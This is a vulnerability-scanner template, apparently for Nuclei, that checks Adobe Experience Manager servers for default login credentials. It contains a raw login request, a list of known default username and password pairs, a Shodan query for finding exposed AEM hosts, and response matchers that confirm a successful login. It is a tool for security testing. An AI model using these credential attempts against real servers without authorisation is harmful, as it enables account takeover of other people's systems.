id: aem-default-login

info:
  name: Adobe AEM Default Login
  author: random-robbie
  severity: high
  description: Adobe AEM default login credentials were discovered.
  reference:
    - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,default-login,adobe

requests:
  - raw:
      - |
        POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/libs/granite/core/content/login.html

        _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true

    attack: pitchfork
    payloads:
      aem_user:
        - admin
        - grios
        - replication-receiver
        - vgnadmin
        - author
        - anonymous
        - jdoe@geometrixx.info
        - aparker@geometrixx.info

      aem_pass:
        - admin
        - password
        - replication-receiver
        - vgnadmin
        - author
        - anonymous
        - jdoe
        - aparker

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - login-token
          - crx.default
        condition: and

# Enhanced by mp on 2022/03/23
